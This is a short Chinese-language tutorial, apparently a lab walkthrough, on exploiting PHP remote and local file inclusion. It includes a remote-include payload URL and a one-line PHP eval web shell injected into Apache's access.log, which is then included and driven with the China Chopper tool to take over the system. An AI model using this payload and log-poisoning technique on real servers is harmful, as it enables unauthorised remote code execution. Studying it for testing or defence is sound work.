PHP远程包含实例
首先打开
C:\php\php-5.2.14-Win32\ php-apache2handler.ini
文件(大家的文件路径不一定是这
个),找到
allow_url_include=off
这行
,
把
off
改成
on。
payload
http://192.188.1.55:8080/include/nain.php?page=http://192.168.1.55:8000/include/2.jps
包含日志文件
当某个
PHP
文件存在本地包含漏洞,而却无法上传正常文件,这就意味着有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache
日志文件来入侵。
Apache
服务器运行后会生成两个日志文件,这两个文件是
access.log(
访问日志
)
和
error.log(
错误日
志
)
,
apache
的日志文件记录下我们的操作,并且写到访问日志文件
access.log
之中
首先开启日志记录功能
找到httpd-conf,然后打开,在配置中修改日志开启状态
然后重启phpstudy即可
看到了
access.log
文件,这个日志记录文件在工作中都是要开启的,首先现在国家安全法里面规定要进行日志记录,再有就是企业可以通过日志记录快速的排查问题出现在哪里,方便工作,虽然默认配置中没有开启日志记录,但是我们一定要开。
比如我们刷新一下刚才的请求
然后打开access.log文件,看日志
任何访问都被记录下来了。那么针对日志记录格式,其实在配置文件中也可以修改的
好,日志记录开启之后,我们继续来看我们的日志文件包含漏洞
比如我们找一个一句话木马 <?php @eval($_POST['123']);?>
然后通过浏览器访问一下
然后看日志
攻击代码被记录了,然后我们通过相对路径来找到access.log文件
然后有的时候,我们通过菜刀就能执行它了,但是有时候可能不行昂,有些编码数据可能菜刀不能识别出来,我们试一下
建立连接,拿下系统
这就是包含日志文件的漏洞利用,当然了如果有文件上传功能的话,我们通过上传文件携带木马的手段也能玩,日志这种是没有上传功能的网站的漏洞利用方式。